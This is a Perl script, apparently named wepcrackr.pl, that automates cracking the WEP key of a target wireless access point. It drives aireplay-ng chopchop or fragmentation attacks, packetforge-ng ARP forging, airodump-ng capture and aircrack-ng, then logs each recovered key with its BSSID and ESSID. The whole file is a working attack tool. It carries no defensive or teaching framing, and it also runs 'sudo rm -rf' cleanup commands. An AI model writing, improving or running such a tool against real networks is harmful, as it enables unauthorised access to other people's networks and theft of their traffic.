#!usr/bin/perl #2.0 changes: addded file checking, recursivity, logfile of cracked AP's $recursive = 0; # <-- 0 = off, 1 = on (keep trying if no key found) sub banner { print< <4/5> (4 = chopchop attack, 5 = fragmentation attack) EOF exit; } sub clean { system("sudo rm -rf arp-request"); system("sudo rm -rf capture*.*"); system("sudo rm -rf replay_*.*"); system("sudo rm -rf cracked_wep.txt"); system("sudo rm -rf wpa_supplicant.conf"); } sub stop { print "[+] Cleaning up... again \n"; &clean; if($recursive == 0){print "[+] Recursivity disabled in source (line 3) \n";} print "[-] Cracking WEP failed \n"; if($recursive == 1){exec("sudo perl wepcrackr.pl $bssid $channel $essid $mac $interface $attack $attempt");} exit; } $bssid = $ARGV[0]; #tryed using "shift @_" (outside sub routine) and "@argv", but didn't work, cheers clone4 anyway :D $channel = $ARGV[1]; $essid = $ARGV[2]; $mac = $ARGV[3]; $interface = $ARGV[4]; $attack = $ARGV[5]; $attempt = $ARGV[6]; system("clear"); &banner; if($attempt > 0){ print "[+] Attempt no. $attempt \n"; $attempt = $attempt + 1; } if(!$attempt){$attempt = 2;} print "[+] Cleaning before cracking \n"; &clean; open (config, ">wpa_supplicant.conf"); print config "network={\n"; print config " ssid=\"$essid\"\n"; print config " key_mgmt=NONE\n"; print config " bssid=$bssid\n"; print config " wep_key0=\"fakekey\"\n"; print config "}\n"; close (config); if (!defined($pid = fork())) { print "resources not avilable.\n"; } elsif ($pid == 0) { use Cwd qw(realpath); my $fullpath = substr(realpath($0), 0, -12); exec("xterm -e sudo wpa_supplicant -c".$fullpath."wpa_supplicant.conf -Dwext -i$interface"); } else { print "[+] Associating with $essid \n"; sleep 2; if ($attack == 4){ print "[+] Performing chopchop attack \n"; } if ($attack == 5){ print "[+] Performing fragmentation attack \n"; } if ($attack != (4||5)){ print "[-] Only attack types 4 & 5 supported \n"; kill 15, $pid; &stop; } system("xterm -e sudo aireplay-ng -$attack -F -h $mac -a $bssid mon0"); if (!glob){ print "[-] Replay_*.xor couldn't be found!\n"; kill 15, $pid; &stop; } print "[+] "; system("sudo packetforge-ng -0 -h $mac -a $bssid -k 255.255.255.255 -l 255.255.255.255 -y replay_*.xor -w arp-request mon0"); if (!defined($airodumpid = fork())) { die "cannot fork: $!"; } elsif ($airodumpid == 0) { print "[+] Capturing IV's \n"; exec("xterm -e sudo airodump-ng -c $channel --bssid $bssid -w capture mon0"); } else { if (!defined($aireplayid = fork())) { die "cannot fork: $!"; } elsif ($aireplayid == 0) { print "[+] Sending ARP requests \n"; exec("xterm -e sudo aireplay-ng -2 -F -r arp-request mon0"); }else{ print "[+] Cracking IV's \n"; $filehasdata = 0; while ($filehasdata == 0){ if ( (-s "capture-01.cap") && (-e "capture-01.txt") ){ $filehasdata = 1; } } system("sudo aircrack-ng -q -b $bssid capture*.cap > cracked_wep.txt"); print "[+] Killing threads \n"; kill 15, $aireplayid; kill 15, $airodumpid; kill 15, $pid; } } } open(KEY, "cracked_wep.txt"); while (){ my($line) = $_; chomp($line); $line =~ tr/[a-z]/[A-Z]/; if($line =~ m/KEY FOUND/){ $line = substr($line, 11); $wep_key = $line; } } close(KEY); print "[+] Cleaning up... again \n"; &clean; if($wep_key){ open(SAVEDKEYS, ">>wireless_cracked.txt"); print SAVEDKEYS "BSSID: $bssid \n"; print SAVEDKEYS "ESSID: $essid \n"; print SAVEDKEYS "channel: $channel \n"; print SAVEDKEYS "key: $wep_key \n\n"; close (SAVEDKEYS); } if($wep_key){ print "[!] Wep key: $wep_key \n"; }else{ if($recursive == 0){print "[+] Recursivity disabled in source (line 3) \n";} print "[-] Cracking WEP failed \n"; if($recursive == 1){exec("sudo perl wepcrackr.pl $bssid $channel $essid $mac $interface $attack $attempt");} }